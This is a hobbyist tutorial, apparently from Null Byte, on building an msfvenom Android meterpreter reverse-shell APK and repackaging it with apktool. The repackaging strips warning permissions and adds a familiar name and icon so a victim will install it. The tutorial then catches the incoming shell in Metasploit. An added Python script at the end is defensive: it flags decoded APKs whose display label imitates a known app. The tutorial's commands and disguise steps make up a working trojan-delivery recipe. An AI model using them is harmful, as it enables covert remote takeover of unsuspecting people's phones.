Well hello dear readers of Null Byte,
let me start off by stating that English is not my first language, so there will be some grammar mistakes. This is also my first tutorial, so don’t hesitate to give me feedback 🙂
You may have made a malicious APK (Android package) before on Kali. It is done the same way you make a malicious exe: with msfvenom.
In this short tutorial I will show you how to change the icon, permissions, and name of the app to make it more convincing for your victim, something which can be very relevant when you are social engineering someone.
So, let’s start off by making our meterpreter APK. Enter this command in the terminal:
msfvenom -p android/meterpreter/reversetcp LHOST=(your ip) LPORT=(your port) -o app.apk
This will create app.apk in your current folder.
Now comes the hard part.
You will need to install Apktool on your system. I used Windows for this, but it should be done the same way on Linux/macOS. Since this is different for everybody, I won’t cover installing this tool. Check out their website for your system.
Do note that Apktool is installed by default in the reverse engineering toolkit from Kali Linux!
First check if you can run apktool properly by running the command:
If you get the help menu, everything is installed correctly. Now run the command:
apktool d /pathtoyourapk/app.apk /pathtoyourfolder/folder
apktool will now decompile app.apk to /pathtoyourfolder/folder. In this new folder you will find some files, most likely:
- The ‘res’ folder
- The AndroidManifest.xml file
- The ‘smali’ folder
- The ‘original’ folder
- The apktool.yml file
For this tutorial we are only going to modify the AndroidManifest.xml file and the ‘res’ folder. First off, open AndroidManifest.xml with your preferred text editor. I am using Notepad++.
You will see something like this:
First off, let’s delete a few lines that we will probably not need and that would give the user an extra warning.
Since Null Byte messes with symbols, here is a pastebin with what to do
You’re back? Great.
Now we are going into the ‘res’ folder. Here you will find the ‘values’ folder; go into it. You will find 2 files, one of them named strings.xml. Once again, open this XML file with your preferred text editor.
You will find the line
The goal is to get 3 png files of the following sizes:
- 36×36 (pixels) for the ldpi folder
- 48×48 for the mdpi folder
- 72×72 for the hdpi folder
Name these png files all ‘icon.png’ and place them in the appropriate folder.
This process is very straightforward. Go back to the apktool terminal and enter the following command:
apktool b /pathtoyourfolder/folder
This will create an APK in the newly created ‘dist’ folder (found in /pathtoyourfolder/folder).
You thought we were done? Almost, just one more step.
java -jar signapk.jar certificate.pem key.pk8 /pathtoyourapp/app.apk signed.apk
This will create a file named signed.apk in the new folder which you can send to the victim and they will see a familiar app name and icon.
Now the final part,
open up metasploit using:
set the payload
set LHOST and LPORT
set LPORT (your port)
set LHOST (your host)
Now once they open up the app, you will get an incoming meterpreter shell, sweet right?
I hope you enjoyed my (first) tutorial, so let me know in the comments what you think.
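
For analysts handed an APK like the one above, an added example (not code from the original tutorial): it reads the two files the tutorial edits, AndroidManifest.xml and res/values/strings.xml in an apktool-decoded folder, and flags an app whose display name matches a known app while its package name does not. The allowlist, the package names and the sample files are constructed assumptions.

```python
import pathlib
import tempfile
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
# Hypothetical allowlist: display name -> package the real publisher ships under.
KNOWN_APPS = {"Example Bank": "com.examplebank.mobile"}

def triage(decoded_dir, known_apps=KNOWN_APPS):
    """Inspect an apktool-decoded folder: resolve the label, list permissions, flag mismatches."""
    root = pathlib.Path(decoded_dir)
    manifest = ET.parse(root / "AndroidManifest.xml").getroot()
    package = manifest.get("package", "")
    app = manifest.find("application")
    label = app.get(ANDROID + "label", "") if app is not None else ""
    if label.startswith("@string/"):  # label is a reference into res/values/strings.xml
        key = label.split("/", 1)[1]
        strings = ET.parse(root / "res" / "values" / "strings.xml").getroot()
        label = next((s.text or "" for s in strings.iter("string")
                      if s.get("name") == key), label)
    perms = sorted(p.get(ANDROID + "name", "") for p in manifest.iter("uses-permission"))
    findings = []
    expected = known_apps.get(label.strip())
    if expected and expected != package:
        findings.append(f"label {label!r} is published as {expected}, but package is {package}")
    return {"package": package, "label": label, "permissions": perms, "findings": findings}

def write_sample(folder, package, app_name):
    """Write a constructed decoded-APK folder (sample data, not from a real app)."""
    root = pathlib.Path(folder)
    (root / "res" / "values").mkdir(parents=True)
    (root / "AndroidManifest.xml").write_text(
        '<manifest xmlns:android="http://schemas.android.com/apk/res/android" '
        f'package="{package}">'
        '<uses-permission android:name="android.permission.INTERNET"/>'
        '<uses-permission android:name="android.permission.READ_SMS"/>'
        '<application android:label="@string/app_name" android:icon="@drawable/icon"/>'
        '</manifest>', encoding="utf-8")
    (root / "res" / "values" / "strings.xml").write_text(
        f'<resources><string name="app_name">{app_name}</string></resources>',
        encoding="utf-8")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        sample = write_sample(pathlib.Path(tmp) / "decoded", "com.example.stage", "Example Bank")
        for line in triage(sample)["findings"] or ["no label/package mismatch"]:
            print(line)
```

The returned permission list shows what the manifest still requests after editing, so it can be compared with what the genuine app declares.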